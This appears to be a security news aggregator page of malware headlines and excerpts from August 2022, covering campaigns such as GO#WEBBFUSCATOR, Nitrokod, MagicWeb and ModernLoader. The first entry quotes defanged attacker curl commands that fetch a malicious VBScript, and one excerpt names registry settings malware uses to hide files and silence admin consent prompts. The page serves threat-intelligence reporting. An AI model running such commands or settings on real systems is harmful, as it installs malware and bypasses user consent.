What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-09-01 01:51:53 | Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) (lien direct) | The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp Both commands save scripts in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript codes that perform features such as registering to task... | Malware | ||
|
2022-08-31 23:26:41 | RAT Tool Disguised as Solution File (*.sln) Being Distributed on Github (lien direct) | The ASEC analysis team has recently discovered the distribution of a RAT Tool disguised as a solution file (*.sln) on GitHub. As shown in Figure 1, the malware distributor is sharing a source code on GitHub titled “Jpg Png Exploit Downloader Fud Cryter Malware Builder Cve 2022”. The file composition looks normal, but the solution file (*.sln) is actually a RAT tool. It is through methods like this that the malware distributor lures users to run the RAT tool by... | Malware Tool | ||
 |
2022-08-31 18:00:00 | James Webb Telescope Images Loaded With Malware Are Evading EDR (lien direct) | New Golang cyberattacks use deep space images and a new obfuscator to target systems - undetected. | Malware | ||
 |
2022-08-31 16:43:57 | GO#WEBBFUSCATOR campaign hides malware in NASA\'s James Webb Space Telescope image (lien direct) | A malware campaign tracked as GO#WEBBFUSCATOR used an image taken from NASA’s James Webb Space Telescope (JWST) as a lure. Securonix Threat researchers uncovered a persistent Golang-based malware campaign tracked as GO#WEBBFUSCATOR that leveraged the deep field image taken from the James Webb telescope. The phishing emails contain a Microsoft Office attachment that includes an external reference […] | Malware Threat | ||
 |
2022-08-31 16:00:00 | Golang-based Malware Campaign Relies on James Webb Telescope\'s Image (lien direct) | Initial infection begins with a phishing email containing a Microsoft Office attachment | Malware | ||
 |
2022-08-31 15:00:00 | James Webb telescope images used to hide malware (lien direct) | >Categories: NewsCategories: ThreatsTags: Msdllupdate.exe Tags: macros Tags: James Webb Tags: certutil Tags: Golang Tags: base64 Tags: steganography Tags: OxB36F8GEEC634.jpg In a recent malware campaign, images from the James Webb telescope were used to hide malware. (Read more...) | Malware | ||
 |
2022-08-31 14:55:37 | Apple quietly revamps malware scanning features in newer macOS versions (lien direct) | New version of XProtect is "as active as many commercial anti-malware products." | Malware | ||
 |
2022-08-31 14:22:00 | Hackers Hide Malware in Stunning Images Taken by James Webb Space Telescope (lien direct) | A persistent Golang-based malware campaign dubbed GO#WEBBFUSCATOR has leveraged the deep field image taken from NASA's James Webb Space Telescope (JWST) as a lure to deploy malicious payloads on infected systems. The development, revealed by Securonix, points to the growing adoption of Go among threat actors, given the programming language's cross-platform support, effectively allowing the | Malware Threat | ||
 |
2022-08-31 13:30:07 | Lost in Translation? New Cryptomining Malware Attacks Based in Turkey Cause Suspicion (lien direct) |
|
Malware | ||
 |
2022-08-31 12:00:00 | Annonce du 9e défi annuel Flare-on Announcing the 9th Annual Flare-On Challenge (lien direct) |
L'équipe Flare organise à nouveau le défi Flare-on cette année.Mettez vos compétences à l'épreuve et en ramassez de nouvelles en cours de route, dans ce défi ingénieur en solo.Le concours commencera à 20h00.ET le 30 septembre 2022. Il s'agit d'un défi de style CTF pour tous les ingénieurs inversés actifs et en herbe, analystes de logiciels malveillants et professionnels de la sécurité.Le concours se déroule pendant six semaines complet et se termine à 20h00.ET le 11 novembre 2022.
Cette année, le concours de \\ comportera un total de 11 défis avec une variété de formats, notamment Windows, JavaScript, .net, Python et même
The FLARE team is once again hosting the Flare-On challenge this year. Put your skills to the test, and pick up some new ones along the way, in this single player reverse engineering challenge. The contest will begin at 8:00 p.m. ET on Sept. 30, 2022. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. The contest runs for six full weeks and ends at 8:00 p.m. ET on Nov. 11, 2022. This year\'s contest will feature a total of 11 challenges featuring a variety of formats including Windows, JavaScript, .NET, Python, and even |
Malware | ★★★ | |
|
2022-08-31 07:23:00 | Chinese Hackers Used ScanBox Framework in Recent Cyber Espionage Attacks (lien direct) | A months-long cyber espionage campaign undertaken by a Chinese nation-state group targeted several entities with reconnaissance malware so as to glean information about its victims and meet its strategic goals. "The targets of this recent campaign spanned Australia, Malaysia, and Europe, as well as entities that operate in the South China Sea," enterprise security firm Proofpoint said in a | Malware | ||
 |
2022-08-30 20:41:00 | Automatic Restoration of Corrupted UPX-packed Samples (lien direct) | >Nozomi Networks Labs scans the web on a daily basis and monitors new techniques that Internet of Things (IoT) malware developers introduce to deceive automated code analysis systems. In most cases, these threats are relatively simple and can be easily bypassed when the sample is manually analyzed in the debugger. However, it can be a […] | Malware | ||
 |
2022-08-30 19:04:28 | Organizations are spending billions on malware defense that\'s easy to bypass (lien direct) | Two of the simplest forms of evasion are surprisingly effective against EDRs. | Malware | ||
 |
2022-08-30 18:08:01 | Hackers hide malware in James Webb telescope images (lien direct) | Threat analysts have spotted a new malware campaign dubbed 'GO#WEBBFUSCATOR' that relies on phishing emails, malicious documents, and space images from the James Webb telescope to spread malware. [...] | Malware Threat | ||
|
2022-08-30 14:20:00 | Cryptominer Disguised as Google Translate Targeted 11 Countries (lien direct) | Created by a Turkish-speaking entity, the malware claimed around 111,000 victims in 11 countries | Malware | ||
|
2022-08-30 13:26:40 | Chinese hackers target Australian govt with ScanBox malware (lien direct) | China-based threat actors have been targeting Australian government agencies and wind turbine fleets in the South China Sea by directing select individuals to a fake impersonating an Australian news media outlet. [...] | Malware Threat | ||
 |
2022-08-30 12:25:24 | LinkedIn New Hacking Scam (lien direct) | Microsoft-owned LinkedIn is being used by hackers to spread data stealing malware via sending connection requests in disguise of people working with reputed companies, a report showed on Tuesday. Researchers found that scammers are exploiting LinkedIn’s chat and job posting features to share links/files that are laced with stealer malware. Since most LinkedIn users accept […] | Malware | ||
 |
2022-08-30 10:27:12 | That \'clean\' Google Translate app is actually Windows crypto-mining malware (lien direct) | Ah, nothing like a classic Trojan horse Watch out: someone is spreading cryptocurrency-mining malware disguised as legitimate-looking applications, such as Google Translate, on free software download sites and through Google searches.… | Malware | ||
 |
2022-08-30 08:00:09 | ModernLoader delivers multiple stealers, cryptominers and RATs (lien direct) |  By Vanja SvajcerCisco Talos recently observed three separate, but related, campaigns between March and June 2022 delivering a variety of threats, including the ModernLoader bot, RedLine information-stealer and cryptocurrency-mining malware to victims. The actors use PowerShell, .NET assemblies, and HTA and VBS files to spread across a targeted network, eventually dropping other pieces of malware, such as the SystemBC trojan and DCRAT, to enable various stages of their operations. The attackers' use of a variety of off-the-shelf tools makes it difficult to attribute this activity to a specific adversary.The final payload appears to be ModernLoader, which acts as a remote access trojan (RAT) by collecting system information and deploying various modules. In the earlier campaigns from March, we also observed the attackers delivering the cryptocurrency mining malware XMRig. The March campaigns appeared to be targeting Eastern European users, as the constructor utility we analyzed had predefined script templates written in Bulgarian, Polish, Hungarian and Russian.The actors are attempting to compromise vulnerable web applications to serve malware and deliver threats via files masquerading as fake Amazon gift cards. Technical detailsInitial findingsIn June 2022, Cisco Talos identified an unusual command line execution in our telemetry. The decoded base64 command is below: Initial finding: A command executed on the system.The 31.41.244[.]231 IP is a Russian IP and hosts several other URLs with similar naming conventions. Autostart commandFollowing the discovery of the initial command, we identified two other command lines. They are a result of an autorun registered executable and the execution of a scheduled task. |
Malware Tool Threat | Yahoo | |
 |
2022-08-30 03:37:00 | Multi-stage crypto-mining malware hides in legitimate apps with month-long delay trigger (lien direct) | Researchers have discovered a new multi-stage malware delivery campaign that relies on legitimate application installers distributed through popular software download sites. The malicious payload delivery, which includes a cryptocurrency mining program, is done in stages with long delays that can add up to almost a month."After the initial software installation, the attackers delayed the infection process for weeks and deleted traces from the original installation," researchers from security firm Check Point Software Technologies said in a new report. "This allowed the campaign to successfully operate under the radar for years."To read this article in full, please click here | Malware | ||
|
2022-08-29 13:19:02 | Windows malware delays coinminer install by a month to evade detection (lien direct) | A new malware campaign disguised as Google Translate or MP3 downloader programs was found distributing cryptocurrency mining malware across 11 countries. [...] | Malware | ||
|
2022-08-29 13:11:48 | Nitrokod crypto miner infected systems across 11 countries since 2019 (lien direct) | >Researchers spotted a Turkish-based crypto miner malware campaign, tracked as Nitrokod, which infected systems across 11 countries. Check Point researchers discovered a Turkish based crypto miner malware campaign, dubbed Nitrokod, which infected machines across 11 countries The threat actors dropped the malware from popular software available on dozens of free software websites, including Softpedia and […] | Malware Threat | ||
 |
2022-08-29 10:00:00 | Crypto miners\' latest techniques (lien direct) | Executive summary
Crypto miners are determined in their objective of mining in other people's resources. Proof of this is one of the latest samples identified with AT&T Alien Labs, with at least 100 different loaders and at least 4 different stages to ensure their miner and backdoor run smoothly in the infected systems.
Key takeaways:
Attackers have been sending malicious attachments, with a special emphasis on Mexican institutions and citizens.
The techniques observed in these samples are known but still effective to keep infecting victims with their miners. Reviewing them assists in reminding defenders the current trends and how to improve their defenses.
The wide variety of loaders in conjunction with the staged delivery of the miner and backdoor malwares, shows how determined the attackers are to successfully deliver their payloads.
Analysis
Crypto miners have been present in the threat landscape for some years, since an attacker identified the opportunity of leveraging victim’s CPUs to mine cryptocurrencies for them. Despite the current rough patch in the world of cryptocurrencies, these miners are still present and will be in the foreseeable future.
As seen in the current analysis, unlike IoT malwares, which also attempt to reach the biggest number of infected devices as possible, these miners target victims through phishing samples. The techniques used by these malwares are usually focused on reaching execution, avoiding detection to run under the radar and gaining persistence to survive any reboot.
A new miner sample showed up in April on AT&T Alien Labs radar, with a wide range of different loaders aiming to execute it in infected systems up to this day. The loaders were initially delivered to the victims through an executable disguised like a spreadsheet. For example, one of the samples (fd5131645025e199caa142c12cef34b344437a0f58306f9b66c35d32618665ba) carries a Microsoft Excel icon, but its file extension corresponds to an executable.
A wide range of decoy documents were found associated with this miner, many of them associated with Mexican civilians: exam results, dentist results, Mexican Governmental documents, Mexican Social Security, Tax returns, etc. Figure 1 corresponds to one of the spreadsheets observed. The campaign identified in this report materialized most of its attacks during the second half of June 2022. For example, the mentioned file above was compiled in late May 2022 and was first observed in the wild a month after, on June 20, 2022.
Figure 1. Decoy spreadsheet ‘ppercepciones anuales.xlsx’.
At the time of execution, the first activities performed are registry changes to cloak the malware samples. For example, by setting ‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt’ to 1, the attackers are hiding the file extensions and camouflaging the executables as documents. Additionally, the registry key ‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden’ is set to 0 to avoid displaying in explorer the hidden files dropped during execution. Finally ‘ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin’ is set to 0 in order to execute any future samples with elevated privileges without explicit consent in the form of a pop up or inserting credentials.
The initial payload drops another executable file while opening the spreadsheet in Figure 1. This additional executable attempts to look like a legitimate executable. It is named ‘CmRccService.exe’ and has the same filename as the metadata associated with the product’s name, description and comments. It is probably an attempt to masquerade the process by making it simila |
Malware Threat | ||
 |
2022-08-29 08:43:08 | Black Hat USA 2022 Continued: Innovation in the NOC (lien direct) | Cisco is a Premium Partner of the Black Hat NOC, and is the Official Wired & Wireless Network Equipment, Mobile Device Management, DNS (Domain Name Service) and Malware Analysis Provider of Black Hat. | Malware | ★★★ | |
 |
2022-08-29 00:00:00 | Le nouveau certificat de cybersécurité offre aux PME une voie vers une plus grande résilience commerciale et un sauvetage en ligne New cyber security certificate offers SMEs a pathway to greater business resilience and online savviness (lien direct) |
Chair of Cybersecurity in Munster Technological University, Dr. Donna O\'Shea, and Head of School of Informatics & Cybersecurity at TU Dublin, Dr. Anthony Keane contributed to this article in the Independent.ie In recent years, cyber security has emerged as a key issue for businesses in Ireland and across the world. Small enterprises are exposed to the same digital threats as larger businesses, but may lack the resources to defend themselves. It has been estimated that almost half of SMEs that suffer a serious cyber attack can go out of business within months. Enhanced cyber security is a matter of great societal importance, because SMEs operating in myriad industries such as retail, health care and construction are the backbone of the Irish economy. They constitute 99pc of all businesses and account for more than half of EU Gross Domestic Product (GDP). SMEs play a vital role in adding value to all sector of the economy, but they may lack essential skills on how to protect their businesses, which are often heavily dependent on digital systems that are vulnerable to cyber-attacks. The urgency of addressing this skills gap was highlighted by the COVID-19 pandemic, which forced many businesses online, exposing them to a higher risk of cyber attacks with little support available. Irish businesses operating online often possess a low cyber security awareness, have inadequate knowledge of GDPR requirements in the protection of critical and sensitive information, and have a low level of Information and Communications Technology (ICT) skills to protect their business. They can also experience significant budgetary constraints that lead them to view cyber security as a relatively significant cost, rather than an important investment in their business resilience. In addition, many SMEs have direct and indirect business relationships with larger organisations. For this reason, cyber criminals often focus on SMEs as a gateway into the larger organisations, knowing that these smaller businesses\' cyber awareness and defensive structures are typically less robust than those of the criminals\' larger targets. Recently, the National Cyber Security Centre (NCSC) and the Garda National Crime Bureau have written to the Small Firms Association to warn business owners of the ongoing series of ransomware attacks. They have observed a growing trend of small and medium sized enterprises being targeted by cybercrime groups with ransomware malicious software that is designed to block access to a computer system. Another common cyber crime tactic is threatening to leak sensitive stolen data until a sum of money is paid. The NCSC said it has noticed a change in tactics whereby hackers are now turning their attention away from big business and Government departments, towards smaller businesses. Providing businesses with cyber skills Professor Donna O\'Shea is Chair of Cybersecurity in Munster Technological University and currently leads a Higher Education Authority (HEA) Human Capital Initiative (HCI) project called CYBER-SKILLS: a nationally funded project in collaboration with University of Limerick, Technological University (TU) Dublin, and Commonwealth Cyber Initiative, Virginia Tech U.S. This ground-breaking initiative aims to address the cybersecurity skills challenge in Irish SMEs. Prof. O\'Shea says, “Growing up, my family owned an electrical retail store, so I really understood the challenges that small businesses face, their limitations in terms of time and how cost can sometimes be a barrier. When designing the course Certificate in Cybersecurity for Business for CYBER-SKILLS, we really wanted a pathway to be open to everyone and we wanted to reduce the barriers to participating in the course, by reducing the cost, making it flexible in delivery, focusing on applied skills and providing the essential necessary knowledge and skills to protect small businesses everywhere against cyber attacks.” Irish professionals and businesses have expressed a growing interest in cybersecurity courses and careers, as borne out by the recen | Ransomware Data Breach Malware Patching Prediction Cloud | ★★ | |
|
2022-08-27 11:14:07 | Fake \'Cthulhu World\' P2E project used to push info-stealing malware (lien direct) | Hackers have created a fake 'Cthulhu World' play-to-earn community, including websites, Discord groups, social accounts, and a Medium developer site, to distribute the Raccoon Stealer, AsyncRAT, and RedLine password-stealing malware infections on unsuspecting victims. [...] | Malware | ||
|
2022-08-26 13:18:17 | Endpoint Protection / Antivirus Products Tested for Malware Protection (lien direct) | Six out of the eight products achieved an "A" rating or higher for blocking malware attacks. Reports are provided to the community for free. | Malware | ||
|
2022-08-25 18:54:00 | Microsoft Uncovers New Post-Compromise Malware Used by Nobelium Hackers (lien direct) | The threat actor behind the SolarWinds supply chain attack has been linked to yet another "highly targeted" post-exploitation malware that could be used to maintain persistent access to compromised environments. Dubbed MagicWeb by Microsoft's threat intelligence teams, the development reiterates Nobelium's commitment to developing and maintaining purpose-built capabilities. Nobelium is the tech | Malware Threat | ||
|
2022-08-25 18:33:35 | How \'Kimsuky\' hackers ensure their malware only reach valid targets (lien direct) | The North Korean 'Kimsuky' threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not on the systems of security researchers. [...] | Malware Threat | ||
|
2022-08-25 17:11:38 | Nobelium APT uses new Post-Compromise malware MagicWeb (lien direct) | >Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked NOBELIUM APT group to maintain persistent access to compromised environments. The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that […] | Malware Threat | APT 29 | |
|
2022-08-25 15:55:00 | Researchers Uncover Kimusky Infra Targeting South Korean Politicians and Diplomats (lien direct) | The North Korean nation-state group Kimusky has been linked to a new set of malicious activities directed against political and diplomatic entities located in its southern counterpart in early 2022. Russian cybersecurity firm Kaspersky codenamed the cluster GoldDragon, with the infection chains leading to the deployment of Windows malware designed to file lists, user keystrokes, and stored web | Malware Guideline | ||
 |
2022-08-25 13:13:21 | Ransomware attacks jump as new malware strains proliferate, research finds (lien direct) | >Ransomware cases increased 47 percent amid a rise in attacks involving new strains of malware from the LockBit cybercrime syndicate. | Malware | ||
|
2022-08-25 12:36:49 | Microsoft: Russian malware hijacks ADFS to log in as anyone in Windows (lien direct) | Microsoft has discovered a new malware used by the Russian hacker group APT29 (a.k.a. NOBELIUM, Cozy Bear) that enables authentication as anyone in a compromised network. [...] | Malware | APT 29 | ★★★ |
 |
2022-08-25 10:23:06 | STOP/DJVU Ransomware (lien direct) | >STOP/DJVU ransomware has been with us since 2019. New versions are released periodically; however, the new STOP/DJVU ransomware versions usually focus on adding new encrypted file extensions. There were almost 200 different encryption extensions observed in the wild through 2019 alone. This ransomware contains a lot of unused code, probably inserted to delay malware […] | Ransomware Malware | ★★★ | |
 |
2022-08-25 10:16:06 | Microsoft Details New Post-Compromise Malware Used by Russian Cyberspies (lien direct) | Microsoft this week published technical details on 'MagicWeb', a new post-exploitation tool used by Russia-linked cyberespionage group APT29. | Malware Tool | APT 29 | |
|
2022-08-25 09:24:07 | Shout-out to whoever went to Black Hat with North Korean malware on their PC (lien direct) | I am the one who NOCs The folks tasked with defending the Black Hat conference network see a lot of weird, sometimes hostile activity, and this year it included malware linked to Kim Jong-un's agents.… | Malware | ||
|
2022-08-25 07:18:40 | PyPI packages hijacked after developers fall for phishing emails (lien direct) | A phishing campaign caught yesterday was seen targeting maintainers of Python packages published to the PyPI registry. Python packages 'exotel' and 'spam' are among hundreds seen laced with malware after attackers successfully compromised accounts of maintainers who fell for the phishing email. [...] | Malware | ||
|
2022-08-25 06:00:00 | DNS data indicates increased malicious domain activity, phishing toolkit reuse (lien direct) | New research from cybersecurity vendor Akamai has revealed that 12.3% of monitored devices communicated with domains associated with malware or ransomware at least once during the second quarter of 2022. This represented a 3% increase compared to Q1 2022, the firm stated, with phishing toolkits playing a key role in malicious domain-related activity. The findings are based on DNS data and Akamai's visibility into carrier and enterprise traffic across different industries and geographies.Increased malware, phishing, C2 domain activity detected in Q2 2022 In a blog post detailing its research, Akamai stated that, in addition to the devices it detected communicating with domains associated with malware/ransomware, a further 6.2% of devices accessed phishing domains with 0.8% accessing command-and-control (C2)-associated domains (both small increases on Q1 2022). “While this number might seem insignificant, the scale here is in the millions of devices,” the firm wrote. “When this is considered, with C2 being the most malignant of threats, this is not only significant, it's cardinal.”To read this article in full, please click here | Ransomware Malware | ||
|
2022-08-24 19:29:23 | Efficient \'MagicWeb\' Malware Subverts AD FS Authentication, Microsoft Warns (lien direct) | The Russia-backed Nobelium APT has pioneered a post-exploitation tool allowing attackers to authenticate as any user. | Malware Tool | ||
|
2022-08-24 13:46:20 | CyberRatings.org Announces New Web Browser Test Results for 2022 (lien direct) | Three of the world's leading browsers were measured for phishing and malware protection, with time to block and protection over time as key metrics in test scores. | Malware Guideline | ||
|
2022-08-24 12:50:34 | Ukraine Independence Day: Talos update (lien direct) | On Independence Day for Ukraine, Aug. 24, 2022, Cisco Talos provided a live update on its continued support for the region. Six months since the invasion of Russia's invasion of Ukraine, Dmytro Korzhevin, a senior threat intelligence researcher, JJ Cummings, Talos' national intelligence principal, and Ashlee Benge, a strategic intelligence lead, provided insights into their past few months of work in the region.The discussion primarily focused on the resiliency of Ukrainians, who have worked tirelessly over the years to transform their cybersecurity capabilities. Ukrainian infrastructure has largely stayed operational and, in most cases, exceeded expectations. It seems to have baffled most pundits, but for those that have spent years working in Ukraine, it's no surprise about the levels of dedication and commitment to protecting their critical infrastructure from those that would do it harm. The team also covered how groundwork laid years ago is paying dividends now during the war, as well as an update on the types of cyber threats we're observing, including the deployment of the GoMet backdoor. At the beginning of the broadcast, Korzhevin shared what Independence Day of Ukraine means for him. "Independence is not an extra day off, but a value that should be used for the benefit of every citizen of our country," he added after the stream. "Independence is the will. Independence lives in every person. If we are independent, it means that we are free. That is, we live, not exist. The same goes for the state. Independence of Ukraine is when we have the possibility to develop the state as we want it and not as we are told when we have a real own history and not a twisted one when we speak our native language and not a hostile one. And now that there is a war in Ukraine, the most important task of our people is to preserve Independence. So that we, our children, grandchildren and all future generations of Ukrainians could live and build our state based on national traditions and core democratic values. Independence is primarily a way, not a condition. I believe that we will overcome all the difficulties in this way."Bengee added that Cisco and Talos have several resources available to any organizations in Ukraine that are in need of assistance. "If you are an organization in Ukraine who is interested in having Talos' help, and you would like to participate in our threat hunting program, please reach out via our social channels," she said. "We are offering our security products for free to Ukrainian organizations, as it's important to us to continue to support Ukraine throughout the duration of the conflict."A recording of the broadcast is available here and above.In our continued efforts to support Ukraine the following blogs have been translated into Ukrainian: Current executive guidance for ongoing cyberattacks in Ukraine Talos on the developing situation in Ukraine Cisco stands on guard with our customers in Ukraine Threat Advisory: Opportunistic | Malware Threat Guideline | ★★★★ | |
 |
2022-08-24 12:15:08 | CVE-2022-33172 (lien direct) | de.fac2 1.34 allows bypassing the User Presence protection mechanism when there is malware on the victim's PC. | Malware | ★★★ | |
|
2022-08-24 05:12:00 | Hackers Using Fake DDoS Protection Pages to Distribute Malware (lien direct) | WordPress sites are being hacked to display fraudulent Cloudflare DDoS protection pages that lead to the delivery of malware such as NetSupport RAT and Raccoon Stealer. "A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which lead victims to download remote access trojan malware," Sucuri's Ben Martin said in a write-up published last week | Malware Guideline | ||
|
2022-08-24 05:02:44 | AsyncRAT Being Distributed in Fileless Form (lien direct) | The ASEC analysis team has recently discovered that malicious AsyncRAT codes are being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails. AsyncRAT is an open-source RAT malware developed with .NET that can execute various malicious activities under the command of the attacker. The compressed file being distributed through phishing emails has an html file and executing this file will... | Malware | ||
|
2022-08-23 18:02:04 | Pirated 3DMark benchmark tool delivering info-stealer malware (lien direct) | Cybersecurity researchers have discovered multiple ongoing malware distribution campaigns that target internet users who seek to download copies of pirated software. [...] | Malware Tool | ||
 |
2022-08-23 17:35:00 | Anomali Cyber Watch: Emissary Panda Adds New Operation Systems to Its Supply-Chain Attacks, Russia-Sponsored Seaborgium Spies on NATO Countries, TA558 Switches from Macros to Container Files, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Cyberespionage, DDoS, Russia, Spearphishing, Supply chain, Taiwan, and Ukraine. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Reservations Requested: TA558 Targets Hospitality and Travel
(published: August 18, 2022)
Since 2018, financially-motivated threat group TA558 has targeted hospitality and travel with reservation-themed, business-relevant phishing emails. The group concentrates on targeting Latin America using lures written in Portuguese and Spanish, and sometimes uses English and wider targeting (North America, Western Europe). TA558 was seen leveraging at least 15 different malware payloads, most often AsyncRAT, Loda RAT, Revenge RAT, and Vjw0rm. In 2022, Proofpoint researchers detected that TA558 increased its activity and moved from using malicious macros to URLs and container files (ISO, RAR).
Analyst Comment: Microsoft’s preparations to disable macros by default in Office products caused multiple threat groups including TA558 to adopt new filetypes to deliver payloads. It is crucial for personnel working with invoices and other external attachments to use updated, secured systems and be trained on phishing threats. Anomali Match can be used to quickly search your infrastructure for known TA558 IOCs.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Ingress Tool Transfer - T1105
Tags: TA558, AsyncRAT, Loda, RAT, Vjw0rm, BluStealer, Revenge RAT, XtremeRAT, Hospitality, Travel, Phishing, ISO, RAR, PowerShell, CVE-2017-11882, CVE-2017-8570
Estonia Subjected to 'Extensive' Cyberattacks after Moving Soviet Monuments
(published: August 18, 2022)
On August 17, 2022, Russian hacktivist group KillNet launched distributed denial-of-service (DDoS) attacks targeting Estonia. The Estonian government confirmed receiving the “most extensive” DDoS attacks in 15 years, but stressed that all services are back online after just some minor interruptions. Small and medium-sized DDoS attacks targeted 16 state and private organizations in the country, with seven of them experiencing downtime as a result. Specifically, the Estonian Tax and Customs Board website was unavailable for about 70 minutes.
Analyst Comment: Russian cyber activity follows political tensions, this time coinciding with the removal of a Red Army memorial. Estonia seemingly easily fended off this Russian DDoS attack, but the country is one of the top in cyber preparedness, and Russia limited it’s strike to using hacktivist groups that give plausible deniability when attributing the cyber attack on a NATO country. Organizations that rely on stable work of their I |
Ransomware Malware Tool Threat | APT 27 | |
|
2022-08-23 16:15:00 | One-Third of Popular PyPI Packages Mistakenly Flagged as Malicious (lien direct) | The scans used by the Python Package Index (PyPI) to find malware fail to catch 41% of bad packages, while creating plentiful false positives. | Malware | ||
|
2022-08-23 13:00:16 | Announcing SOC 2 Compliance for Cisco Secure Endpoint, Cisco Secure Malware Analytics, and Cisco SecureX (lien direct) | We are excited to announce that we have achieved SOC 2 compliance for the Cisco Secure Endpoint solution, Cisco Malware Analytics, and the Cisco SecureX platform! SOC 2 is a compliance framework developed by the American Institute of Certified Public Accountants (AICPA) that helps ensure organizations responsibly handle customer data | Malware | ||
 |
2022-08-23 11:12:43 | (Déjà vu) Counterfeit Phones Found to Contain Backdoor to Hack WhatsApp (lien direct) | Budget Android device models that are counterfeit versions associated with popular smartphone brands contain multiple hidden trojans designed to target WhatsApp and WhatsApp Business messaging app. Doctor Web first came across the malware in July 2022. It was discovered in the system partition of at least four different smartphones: radmi note 8, P48pro, Note30u, and […] | Malware Hack | ||
|
2022-08-23 07:50:00 | Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts (lien direct) | The Iranian government-backed actor known as Charming Kitten has added a new tool to its malware arsenal that allows it to retrieve user data from Gmail, Yahoo!, and Microsoft Outlook accounts. Dubbed HYPERSCRAPE by Google Threat Analysis Group (TAG), the actively in-development malicious software is said to have been used against less than two dozen accounts in Iran, with the oldest known | Malware Tool Threat Conference | Yahoo APT 35 |
To see everything:
Our RSS (filtrered)
